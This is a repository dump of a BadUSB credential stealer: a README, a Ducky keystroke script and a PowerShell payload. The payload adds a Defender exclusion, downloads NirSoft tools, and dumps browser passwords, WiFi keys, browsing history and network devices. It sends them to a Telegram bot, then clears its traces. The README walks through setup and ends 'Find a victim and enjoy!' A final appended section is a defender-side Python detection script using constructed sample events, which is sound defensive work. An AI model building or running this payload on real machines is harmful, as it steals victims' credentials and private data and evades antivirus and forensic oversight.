Repository: tuconnaisyouknow/BadUSB_passStealer
Branch: main
Commit: 15c75a73a047
Files: 4
Total size: 10.8 KB

Directory structure:
gitextract_ugr1m322/
├── LICENSE
├── README.md
└── upload/
    ├── BadUSB_passStealer_upload.txt
    └── ps.ps1

================================================
FILE CONTENTS
================================================

================================================
FILE: LICENSE
================================================
MIT License

Copyright (c) 2022 elliotYouKnow

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

================================================
FILE: README.md
================================================
# 💀 BadUSB_passStealer

## ⚠️ Warning

Everything in this repository is **strictly** for educational purposes.
**I am not responsible** for any stolen data.
**You are responsible** for your actions when using this script for **BadUSB**.
## ℹ️ About

This **script** allows you to steal the following **information**:

🔹 Browser **passwords** (Chrome, Firefox, Opera)
🔹 **WiFi** passwords
🔹 Browser **history** from the last 7 days
🔹 A **list** of all **devices** connected to the victim's network

## 🔑 Key Information for Users

### ⚠️ MalDuino & Rubber Ducky Users

You **must** replace **`CTRL-SHIFT ENTER`** with **`CTRL SHIFT ENTER`** in the [`ps.ps1`](https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/upload/ps.ps1) file.

✅ **Flipper Zero users**, no changes are needed: this syntax is already compatible.

### ⚠️ Arduino Users

🚫 I **stopped upgrading** `.ino` scripts. If you need them, you can **convert Ducky Scripts** [here](https://duckify.huhn.me/).

### 🕒 Adjusting Delay

You can customize the **delays** based on the **speed** of the **target machine**.

### ⏳ Waiting for Execution

When you plug the **BadUSB** into a PC, **wait for the Caps Lock to flash** before unplugging it.

---

# 🚀 Getting Started

## 📌 Requirements

✔️ A **BadUSB**
✔️ Install **Arduino software** [here](https://www.arduino.cc/en/software) *(if using an Arduino-based BadUSB)*
✔️ A **Telegram account**
✔️ A **victim using Windows 10/11**

---

# 🤖 Setting up a Telegram Bot for Uploading Files

## 1️⃣ Create a Telegram Bot

1️⃣ Open [Telegram Web](https://web.telegram.org/) and log in.
2️⃣ Search for **@BotFather** in the Telegram search bar.
3️⃣ Click **Start** to begin a conversation.
4️⃣ Send `/newbot`.
5️⃣ Choose a bot **name** and send it.
6️⃣ Choose a bot **username** and send it.
7️⃣ **@BotFather** will provide an API token:

> Done! Congratulations on your new bot. You will find it at t.me/BOT_USERNAME. You can now add a description, about section, and profile picture for your bot. See /help for a list of commands.
> Use this token to access the HTTP API:
> **API_ACCESS_TOKEN**
> For a description of the Bot API, see this page: https://core.telegram.org/bots/api

8️⃣ Start a chat with your bot by clicking **t.me/BOT_USERNAME** and pressing **Start**.

## 2️⃣ Get Your Telegram API Token

Your **API token** is provided in **@BotFather**'s response.

## 3️⃣ Get Your Telegram Chat ID

1️⃣ Open your browser and replace `API_ACCESS_TOKEN` in this URL:

```
https://api.telegram.org/bot/getUpdates?offset=0
```

2️⃣ Send a **test message** to your bot on Telegram.
3️⃣ Refresh the API page.
4️⃣ Find your **chat ID** in the response JSON. Example:

```
"chat":{"id":123456789,"type":"private"}
```

Your chat ID is **123456789**.

---

# ⚙️ Installation for Rubber Ducky, Malduino W, and Flipper Zero

1️⃣ **Download this repository**

🔹 **Linux:**

```bash
git clone https://github.com/tuconnaisyouknow/BadUSB_passStealer
cd BadUSB_passStealer
```

🔹 **Windows:**

- Click the **green "Code" button** at the top right.
- Click **"Download ZIP"** and extract it.

2️⃣ Replace **``** and **``** in [`ps.ps1`](https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/upload/ps.ps1).
3️⃣ **Upload `ps.ps1` to get a downloadable link**.
4️⃣ Replace **`LINK`** in [`BadUSB_passStealer_upload.txt`](https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/upload/BadUSB_passStealer_upload.txt) with the `ps.ps1` link.
5️⃣ Place the `.txt` file in your **BadUSB**.
6️⃣ **Find a victim and enjoy!** 🎭

---

# 🛠️ NirSoft Tools

🔗 You can download NirSoft tools here:

🔹 **[WebBrowserPassView.exe](https://www.nirsoft.net/protected_downloads/passreccommandline.zip)** *(User: `download` | Password: `nirsoft123!`)*
🔹 **[WNetWatcher.exe](https://www.nirsoft.net/utils/wireless_network_watcher.html)**
🔹 **[BrowsingHistoryView.exe](https://www.nirsoft.net/utils/browsing_history_view.html)**
🔹 **[WirelessKeyView.exe](https://www.nirsoft.net/utils/wireless_key.html)**

================================================
FILE: upload/BadUSB_passStealer_upload.txt
================================================
REM _
REM _ _ ___ _ _ | | ___ __ _____ __
REM | | | |/ _ \| | | | | |/ / _ \ / _ \ \ /\ / /
REM | |_| | (_) | |_| |_| <| | | | (_) \ V V /
REM \__, |\___/ \__,_(_)_|\_\_| |_|\___/ \_/\_/
REM |___/
REM ###########################################################
REM #                                                         #
REM # Title       : BadUSB_passStealer                        #
REM # Author      : you.know                                  #
REM # Version     : 2.0                                       #
REM # Category    : Data Exfiltration, Credential Dumping     #
REM # Target      : Windows 10/11                             #
REM #                                                         #
REM # Description:                                            #
REM #   - Launches PowerShell in hidden mode                  #
REM #   - Extracts browser passwords and WiFi credentials     #
REM #   - Saves them as .txt files                            #
REM #   - Exfiltrates the data via Telegram                   #
REM #   - Cleans up traces after execution                    #
REM #                                                         #
REM ###########################################################

REM Initial delay to ensure the system is ready
DELAY 2500

REM Minimize all active windows
GUI d
DELAY 500

REM Open Run dialog
GUI r
DELAY 500

REM Execute PowerShell hidden with administrative privileges
STRING powershell -w h -NoP -Ep Bypass -Command "irm | iex"
CTRL-SHIFT ENTER
DELAY 1000
LEFT
DELAY 500
ENTER

REM Flash CAPSLOCK as an indicator that execution is complete
CAPSLOCK
DELAY 500
CAPSLOCK
DELAY 500
CAPSLOCK
DELAY 500
CAPSLOCK

================================================
FILE: upload/ps.ps1
================================================
# _
# _ _ ___ _ _ | | ___ __ _____ __
# | | | |/ _ \| | | | | |/ / _ \ / _ \ \ /\ / /
# | |_| | (_) | |_| |_| <| | | | (_) \ V V /
# \__, |\___/ \__,_(_)_|\_\_| |_|\___/ \_/\_/
# |___/

$basePath = "C:\Users\Public\Documents\scripts"
$dumpFolder = "$basePath\$env:USERNAME-$(get-date -f yyyy-MM-dd)"
$dumpFile = "$dumpFolder.zip"

# Create directory
New-Item -ItemType Directory -Path $basePath -Force | Out-Null
Set-Location $basePath
New-Item -ItemType Directory -Path $dumpFolder -Force | Out-Null
Add-MpPreference -ExclusionPath $basePath -Force

# Download necessary tools
Invoke-WebRequest https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/WirelessKeyView.exe?raw=true -OutFile WirelessKeyView.exe
Invoke-WebRequest https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/WebBrowserPassView.exe?raw=true -OutFile WebBrowserPassView.exe
Invoke-WebRequest https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/BrowsingHistoryView.exe?raw=true -OutFile BrowsingHistoryView.exe
Invoke-WebRequest https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/WNetWatcher.exe?raw=true -OutFile WNetWatcher.exe

# Execute tools to gather data
.\WNetWatcher.exe /stext connected_devices.txt
.\BrowsingHistoryView.exe /VisitTimeFilterType 3 7 /stext history.txt
.\WebBrowserPassView.exe /stext passwords.txt
.\WirelessKeyView.exe /stext wifi.txt

# Wait for the files to be fully written
while (!(Test-Path "passwords.txt") -or !(Test-Path "wifi.txt") -or !(Test-Path "connected_devices.txt") -or !(Test-Path "history.txt")) {
    Start-Sleep -Seconds 1
}
Move-Item passwords.txt, wifi.txt, connected_devices.txt, history.txt -Destination "$dumpFolder"

# Compress extracted data
Compress-Archive -Path "$dumpFolder\*" -DestinationPath "$dumpFile" -Force

# Wait until the ZIP file is created
while (!(Test-Path "$dumpFile")) {
    Start-Sleep -Seconds 1
}

# Telegram configuration
$token = ""
$chatID = ""
$uri = "https://api.telegram.org/bot$token/sendDocument"
$caption = "Here are exfiltrated informations from $env:USERNAME"

# Check if the file exists before sending
if (!(Test-Path $dumpFile)) { exit 1 }

# Ensure System.Net.Http is available
if (-not ("System.Net.Http.HttpClient" -as [type])) {
    $httpPath = Get-ChildItem -Path "C:\Windows\Microsoft.NET\Framework64\" -Recurse -Filter "System.Net.Http.dll" | Select-Object -First 1 -ExpandProperty FullName
    if ($httpPath) { Add-Type -Path $httpPath } else { exit 1 }
}

# Create HTTP client
$client = New-Object System.Net.Http.HttpClient
$content = New-Object System.Net.Http.MultipartFormDataContent
$content.Add((New-Object System.Net.Http.StringContent($chatID)), "chat_id")
$content.Add((New-Object System.Net.Http.StringContent($caption)), "caption")

# Attach the ZIP file
$filename = [System.IO.Path]::GetFileName("$dumpFile")
$fileStream = [System.IO.File]::OpenRead("$dumpFile")
$fileContent = New-Object System.Net.Http.StreamContent($fileStream)
$fileContent.Headers.ContentType = [System.Net.Http.Headers.MediaTypeHeaderValue]::Parse("application/octet-stream")
$content.Add($fileContent, "document", $filename)

# Send data to Telegram
try {
    $client.PostAsync($uri, $content).Wait()
} catch {}

# Cleanup
$fileStream.Close()
$fileStream.Dispose()
Set-Location C:\Users\Public\Documents
Remove-Item -Recurse -Force scripts
Remove-MpPreference -ExclusionPath "C:\Users\Public\Documents\scripts" -Force

# Caps Lock signal
$keyBoardObject = New-Object -ComObject WScript.Shell
for ($i=0; $i -lt 4; $i++) {
    $keyBoardObject.SendKeys("{CAPSLOCK}")
    Start-Sleep -Seconds 1
}

# Clear command history
Clear-Content (Get-PSReadlineOption).HistorySavePath
exit
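The two files above leave a recognisable trail on the host, and the following detection logic, written here as an added defender-side example (it is not part of this repository), shows how to key on it. It correlates three event streams: process creation (the hidden, policy-bypassing `irm | iex` launch typed by the Ducky script, and the NirSoft tools later running from the excluded folder), Microsoft Defender configuration-change messages (the `Add-MpPreference` / `Remove-MpPreference` pair in `ps.ps1`), and outbound connections from `powershell.exe` to `api.telegram.org`. Everything in `SAMPLE_EVENTS` is constructed: the event field names, the approximation of the Defender event 5007 message text, the `example.invalid` host and the `<TOKEN>` placeholder are all assumptions, not real telemetry.

```python
import re
from datetime import datetime, timedelta

# Command-line indicators. Short aliases (-w h, -NoP, -Ep, irm, iex) are the
# forms the Ducky payload above types; long forms are covered too so that
# spelling the switches out does not evade the rule.
CMDLINE_INDICATORS = {
    "hidden_window": r"-w(?:indowstyle)?\s+h(?:idden)?\b",
    "no_profile": r"-nop(?:rofile)?\b",
    "execution_policy_bypass": r"-e(?:p|xecutionpolicy)\s+bypass\b",
    "download_cradle": r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b"
                       r".*\|\s*(?:iex|invoke-expression)\b",
}

# Defender event 5007 reports a configuration change as "Old value: ... New value: ...".
# The message layout used below is an approximation of the real event text (assumption).
CHANGE_RE = re.compile(r"Old value:\s*(?P<old>.*?)\s*New value:\s*(?P<new>.*)$", re.I)
PATH_RE = re.compile(r"Exclusions\\Paths\\(?P<path>.+?)\s*=\s*0x0", re.I)
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")


def cmdline_indicators(cmdline):
    """Names of the indicators present in a PowerShell command line."""
    return [n for n, p in CMDLINE_INDICATORS.items() if re.search(p, cmdline, re.I)]


def parse_exclusion_change(message):
    """Return ('add' | 'remove', path) for a path-exclusion change, else None."""
    m = CHANGE_RE.search(message)
    if not m:
        return None
    for action, text in (("add", m["new"]), ("remove", m["old"])):
        p = PATH_RE.search(text)
        if p:
            return action, p["path"]
    return None


def analyze(events, window=timedelta(minutes=10)):
    """Correlate process, Defender and network events into (time, rule, detail) alerts."""
    alerts, active = [], {}          # active: excluded path prefix -> time it was added
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = ev["ts"]
        if ev["type"] == "process":
            hits = cmdline_indicators(ev["cmdline"])
            if len(hits) >= 2:       # a single switch on its own is common in admin scripts
                alerts.append((ts, "suspicious_powershell", ", ".join(hits)))
            for prefix in active:
                if ev["image"].lower().startswith(prefix):
                    alerts.append((ts, "exec_from_excluded_path", ev["image"]))
        elif ev["type"] == "defender":
            change = parse_exclusion_change(ev["message"])
            if change is None:
                continue
            action, path = change
            prefix = path.lower().rstrip("\\") + "\\"
            if action == "add":
                active[prefix] = ts
                if prefix.startswith(USER_WRITABLE):
                    alerts.append((ts, "exclusion_user_writable", path))
            elif action == "remove" and prefix in active:
                # ps.ps1 adds the exclusion, works inside it, then removes it minutes later
                if ts - active.pop(prefix) <= window:
                    alerts.append((ts, "short_lived_exclusion", path))
        elif ev["type"] == "network":
            if ev["host"].lower() == "api.telegram.org" and \
               ev["image"].lower().endswith("powershell.exe"):
                alerts.append((ts, "telegram_api_from_powershell", ev["url"]))
    return alerts


# Constructed sample timeline mirroring the two files above (not real telemetry).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
T0 = datetime(2024, 5, 1, 10, 0, 0)
SAMPLE_EVENTS = [
    {"ts": T0, "type": "process", "image": PS,
     "cmdline": 'powershell -w h -NoP -Ep Bypass -Command "irm https://example.invalid/ps.ps1 | iex"'},
    {"ts": T0 + timedelta(seconds=5), "type": "defender",
     "message": r"Microsoft Defender Antivirus Configuration has changed. Old value: New value: "
                r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Public\Documents\scripts = 0x0"},
    {"ts": T0 + timedelta(seconds=20), "type": "process",
     "image": r"C:\Users\Public\Documents\scripts\WebBrowserPassView.exe",
     "cmdline": "WebBrowserPassView.exe /stext passwords.txt"},
    {"ts": T0 + timedelta(seconds=40), "type": "network", "image": PS,
     "host": "api.telegram.org", "url": "/bot<TOKEN>/sendDocument"},
    {"ts": T0 + timedelta(seconds=50), "type": "defender",
     "message": r"Microsoft Defender Antivirus Configuration has changed. Old value: "
                r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Public\Documents\scripts = 0x0 New value:"},
    {"ts": T0 + timedelta(minutes=30), "type": "process", "image": PS,   # benign admin script
     "cmdline": r"powershell -NoProfile -File C:\Program Files\Backup\nightly.ps1"},
]

if __name__ == "__main__":
    for ts, rule, detail in analyze(SAMPLE_EVENTS):
        print(ts.isoformat(), rule, detail)
```

Run stand-alone, it prints five alerts for the sample timeline and nothing for the benign nightly script. Two points follow directly from the files above: the payload launches `powershell.exe` from an elevated Run prompt, so the exclusion add and remove arrive as two Defender configuration-change events less than a minute apart, which is what `short_lived_exclusion` keys on; and the upload is a multipart POST to `api.telegram.org` made by `powershell.exe` itself, a process-to-destination pairing worth alerting on regardless of the script body. The `-w h` hidden window hides the console, not the script: with PowerShell script block logging enabled, the content fetched by `irm` and executed by `iex` is still recorded in the PowerShell Operational log.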